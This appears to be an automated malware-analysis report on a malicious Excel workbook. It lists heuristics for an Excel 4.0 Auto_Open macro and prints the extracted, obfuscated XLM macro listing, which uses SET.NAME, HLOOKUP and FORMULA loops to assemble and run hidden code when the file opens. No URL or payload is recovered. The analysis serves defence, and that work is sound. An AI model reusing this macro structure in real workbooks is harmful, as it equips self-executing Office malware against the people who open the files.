MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel file contains Excel 4.0 (XLM) macros, specifically an Auto_Open function, which is a known method for executing malicious code. The critical heuristics indicate the presence of dangerous formula APIs within the Auto_Open macro, suggesting it's designed to download and execute a secondary payload. No specific URLs or hashes were extracted, hence the family is unknown.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6619 bytes |
SHA-256: 60d52727ac4e1ba41bea898f211bd823bfc1af5563d68f38b930a63b9b83b97a |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - UrWkTQRSXB
' 0018 26 LABEL : Cell Value, String Constant - aLLoGeUjEUp len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!H176
' 0018 23 LABEL : Cell Value, String Constant - BBAICwLd len=0
' 0018 23 LABEL : Cell Value, String Constant - DuozzvaB len=0
' 0018 21 LABEL : Cell Value, String Constant - dUuLka len=0
' 0018 25 LABEL : Cell Value, String Constant - EQmAvpcYOc len=0
' 0018 22 LABEL : Cell Value, String Constant - FtPRFtj len=0
' 0018 27 LABEL : Cell Value, String Constant - FWjOkznmfMlO len=0
' 0018 25 LABEL : Cell Value, String Constant - ixIYMZLewJ len=0
' 0018 26 LABEL : Cell Value, String Constant - lhvcftroNwE len=0
' 0018 24 LABEL : Cell Value, String Constant - LMllnSCYv len=0
' 0018 20 LABEL : Cell Value, String Constant - mPmZk len=0
' 0018 27 LABEL : Cell Value, String Constant - ohlSBpJaJGUV len=0
' 0018 24 LABEL : Cell Value, String Constant - ohqSSqwgD len=0
' 0018 20 LABEL : Cell Value, String Constant - pkFBP len=0
' 0018 27 LABEL : Cell Value, String Constant - TjoPCKmOdqkW len=0
' 0018 27 LABEL : Cell Value, String Constant - wWVgjKnUVmfc len=0
' 0018 21 LABEL : Cell Value, String Constant - xzGJCQ len=0
' 0018 25 LABEL : Cell Value, String Constant - YDdJnshrIj len=0
' 0018 22 LABEL : Cell Value, String Constant - ysxXCur len=0
' 0018 20 LABEL : Cell Value, String Constant - zBjmW len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' UrWkTQRSXB,H72,"SET.NAME("pkFBP",VALUE("0"))",""
' UrWkTQRSXB,H74,"SET.NAME("wWVgjKnUVmfc",pkFBP)",""
' UrWkTQRSXB,H78,"SET.NAME("DuozzvaB",pkFBP)",""
' UrWkTQRSXB,H82,"SET.NAME("YDdJnshrIj",COUNTA(EQmAvpcYOc))",""
' UrWkTQRSXB,H85,"SET.NAME("LMllnSCYv",COUNTA(mPmZk))",""
' UrWkTQRSXB,H90,[],""
' UrWkTQRSXB,H94,"SET.NAME("ixIYMZLewJ","")",""
' UrWkTQRSXB,H96,"wWVgjKnUVmfc",""
' UrWkTQRSXB,H101,"SET.NAME("FtPRFtj",HLOOKUP("*",EQmAvpcYOc,wWVgjKnUVmfc,FALSE))",""
' UrWkTQRSXB,H103,"BBAICwLd",""
' UrWkTQRSXB,H108,"SET.NAME("ysxXCur",pkFBP)",""
' UrWkTQRSXB,H113,[],""
' UrWkTQRSXB,H118,"ysxXCur",""
' UrWkTQRSXB,H121,"TjoPCKmOdqkW",""
' UrWkTQRSXB,H126,"ohlSBpJaJGUV",""
' UrWkTQRSXB,H129,"aLLoGeUjEUp",""
' UrWkTQRSXB,H132,"SET.NAME("lhvcftroNwE",VALUE(HLOOKUP("*",mPmZk,aLLoGeUjEUp,FALSE)))",""
' UrWkTQRSXB,H137,"zBjmW",""
' UrWkTQRSXB,H142,"ixIYMZLewJ",""
' UrWkTQRSXB,H147,"DuozzvaB",""
' UrWkTQRSXB,H152,NEXT(),""
' UrWkTQRSXB,H154,"dUuLka",""
' UrWkTQRSXB,H158,"SET.NAME("f",INT(T(FORMULA(T(ixIYMZLewJ)&"",""&T(dUuLka)))))",""
' UrWkTQRSXB,H162,"ohqSSqwgD",""
' UrWkTQRSXB,H167,NEXT(),""
' UrWkTQRSXB,H171,RETURN(),""
' UrWkTQRSXB,H201,"SET.NAME("FWjOkznmfMlO",H72)",""
' UrWkTQRSXB,H204,"EQmAvpcYOc",""
' UrWkTQRSXB,H209,"SET.NAME("mPmZk",R77C13)",""
' UrWkTQRSXB,H212,"SET.NAME("ohqSSqwgD",221)",""
' UrWkTQRSXB,H215,"SET.NAME("xzGJCQ",8)",""
' UrWkTQRSXB,H220,FWjOkznmfMlO(),""
' UrWkTQRSXB,H221,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.